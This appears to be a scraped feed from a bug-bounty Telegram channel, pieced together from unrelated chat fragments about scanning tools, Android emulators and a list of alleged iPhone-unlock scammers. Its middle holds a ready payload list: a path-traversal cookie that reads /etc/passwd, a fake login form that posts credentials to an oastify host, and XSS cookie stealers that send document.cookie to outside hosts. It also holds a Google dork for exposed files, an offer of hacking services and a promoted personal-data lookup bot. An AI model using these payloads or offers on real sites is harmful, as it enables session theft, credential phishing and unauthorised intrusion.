3241
Talk and help about bugbounty
What do you mean skipped information,if you want more informative scan use -v or -vv
Читать полностью…
If anyone needs help in hacking service message me up
Читать полностью…
Has anyone ever heard of rudder encryption or seen it a request form
Читать полностью…
How to find local file read vulnerabilities based on cookies.
Request
GET /vulnerable.php HTTP/1.1
Cookie:usid=../../../../../../../../../../../../../etc/pasdwd
Response
HTTP/1.1 200 OK
...
Server: Apache root:fi3sER6:0:1:System Operator:/:/bin/ksh//
#bugbounty #bugbountytip
👋 Hello,
While checking my target. I saw a url ending with config-apim.json.
It contains a client Id, clientlibrary and login.window.net.
What do you think?
On burps or terminal .. so it's gonna grep all the page?
Читать полностью…
https://medium.com/bugbountywriteup/my-hunt-discovering-microsoft-bugs-f6a9c790bec0
Читать полностью…
https://youtu.be/7IAGUD7By0c?si=kOHtzQ_OiYfP6hbc
Читать полностью…
When downloading you have to select the option that says personal use
Genymotion is free
However though I don't know much about this Frida or how to use it
Читать полностью…
I faced thesame thing sometime ago
So I just used genymotion emulator and frida
UNLOCK SCAMMERS ON THE MARKET:
@fmiofficloudunlocks 😡big😡
@minacriis 😡big
@gsmunlocksxpert😡big
@iUnlock_Apple😡big
@iUnlock_Apple_US😡big
@cidunlocker
— A-Z—
@A4star1
@AAlienFuLL
@abracobras (@dgeUnlock)
@Ahmed_1928
@Applboy
@apple_hubs
@Apple_Support87
@apple_unlocking
@appledone
@applefishers
@AppleNewSolution (@OnlinehelpApp)
@appleSolution9
@ApsUnlocking
@arjan_unlock
@arsalangsm
@automatedpanel
@BaliUnlocker
@Bestunlockertz
@bLanc00fficial
@Boss_SmS
@BOSS_UNLOCK
@BossManTech
@DemonServices
@Ecampoverde
@elchapo55555
@Enemy17Tech
@fegunlocks
@financialservicex
@FineChina01 (@AmaizingF)
@finoallfino
@FMI_OFF_OFF
@Fmioff_new
@FoneZone
@gadum5
@ghana_reseller
@glk2050
@Gsm_Ahsan
@GSM_unl0cker
@gsmflashingmobil
@gsmonster2000
@gsms0lution (@EFI0Macbook0)
@GSMSMITH
@GSMSOLUTION100
@gsmsonic
@gsmunlocksxpert
@GSMT3CH
@gsmtanzania1
@Hackerbo_24
@HAFIZ_GSM
@iboyapple
@Icloud_kingg
@icloud_unlock123
@icloud0onoom
@iCloudBosssss4u
@icloudnumberon
@iHelloUnlocker
@imei4unlock
@iOSUnlocking
@iphonecare170
@Iphoneunlocksupport
@iSethos01
@isklm
@iunkownlcloud
@Iunlocker725
@iunlocker786apple
@javed_unlocks
@jevfx0
@John7726
@Johnkenedii
@JohTec
@JokerFmiKing
@kehlanaushan
@kelvin_hacks
@khaad47
@kitpro3
@knoxbypass
@l3gitch3ck
@LambdaICoder
@LeoSoft941Support_bot
@lifeg1
@lifeg1
@linkunlockingstore
@Lost_clean011
@Lost_clean4fast4
@Lost_Gulf_RSA
@mac1t1m1
@mankind56
@mankind56
@mankind56
@marikues
@markoj21
@matrixTopG1
@mikesshady
@mimshak3511
@Mkaburu2
@mobile_unlocks
@moh_apple_fix
@Moneyboss976
@Mr_iCl0ud
@n0stra
@Official_gsm_unlock
@Oliverjarb
@On_To_OFF
@PANEL1SERVICE
@passcodeadmin
@pedrounlocks
@phone_center_1
@Prof_Apple
@Raju3219
@rjctd00
@robsapple
@SA_Apple_Pvt
@sixtriger001
@SmartGSMSolutions
@SMDRAMDISK6
@SMITH706 (@Abhi4343)
@sms_kit
@Soh143
@sohail004
@styfan_here
@Superpandaunlock
@Sure9919
@sydneyza
@TankGsm
@Thefoxhimselff
@trimer0
@Unlock_GSM09
@unlockbestworld
@UnlockerDev
@unlockfastest
@Unlockicloud_Nades
@Usavisa12
@venom_unlocker
@xanderroman
@XpertCleanUnlockerr
@yacine_bennacer
@yamalencok (@kuataoo)
@zayna31
@Zer3K
List will be updated daily, don't deal with this guys.
Here will be added only scammers with proof. Don't come and request adding someone without proofs.
you can see Latest list : /channel/+fgD0OZiqEnNjMTA1
Unlock scammer list
240427
Hello guys , I'm running nuclei, but why do I always get skipped information, is it because of the network? Or is the SSH factor limited? Or are there other factors
Читать полностью…
On my target.
I logout then intercept with Burpsuite then send to repeater and dropped the proxy.
I clear all the cookies in the request form then I generated PoC. I click on the PoC HTML file then it load then I got logout from my account.
Csrf vulnerability?
<A HREF="http://evil.com/">Login Here </A>
<script>document.location.href="http://evil.com"</script>
<h3>Please login to proceed</h3> <form action=http://abp16yqa8m56p2kznk76xvmnqew5kwakz.oastify.com>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Login"></br>
csp bypass:
<script>alert(1)</script>&token=;script-src-elem 'unsafe-inline'
iframe:
"><iframe src="https://nasa.gov" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">
<IFRAME SRC="javascript:alert(document.cookie);"></iframe>
cookie stealer:
<script>document.location='http://sb7j6gqs845opkkhn27oxdm5qwwnks8h.oastify.com?c='+document.cookie</script>
<script>new Image().src="http://localhost/cookie.php?c="+document.cookie</script>
<script>document.body.background=”https://www.jhadol.com/images/photos/original/1465212129eukl.jpg“;</script>
<script>window.location=”https://coffinxp.000webhostapp.com/coffinxp1.html”;</script>
<script>document.body.bgColor=”red”;</script>
# Google Dork: "index of" "user.MYD" # Title: Disclosure of sensitive files. # Date: 15/08/2020 # Author: Sahil Saxena # LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174 # Twitter: https://twitter.com/Sahil_delinitor # GitHub: https://github.com/Sahil-69 # Bugcrowd: https://bugcrowd.com/Prickn Thanks, Sahil Saxena
Читать полностью…
а нафига они тебе? есть сайты с подпиской на пачки socks.. либо намути сам теми же сплоентами )
Читать полностью…
Hello everyone, this is a new information gathering bot, where you get all the information via email, phone number, username and more. Please do check and give a feedback
@Cipherinfo_bot
If there are any resources or material one could use please do share
Читать полностью…
Thanks but the genymotion I'm seeing is a paid version and the free is hard to setup on my pc
Читать полностью…
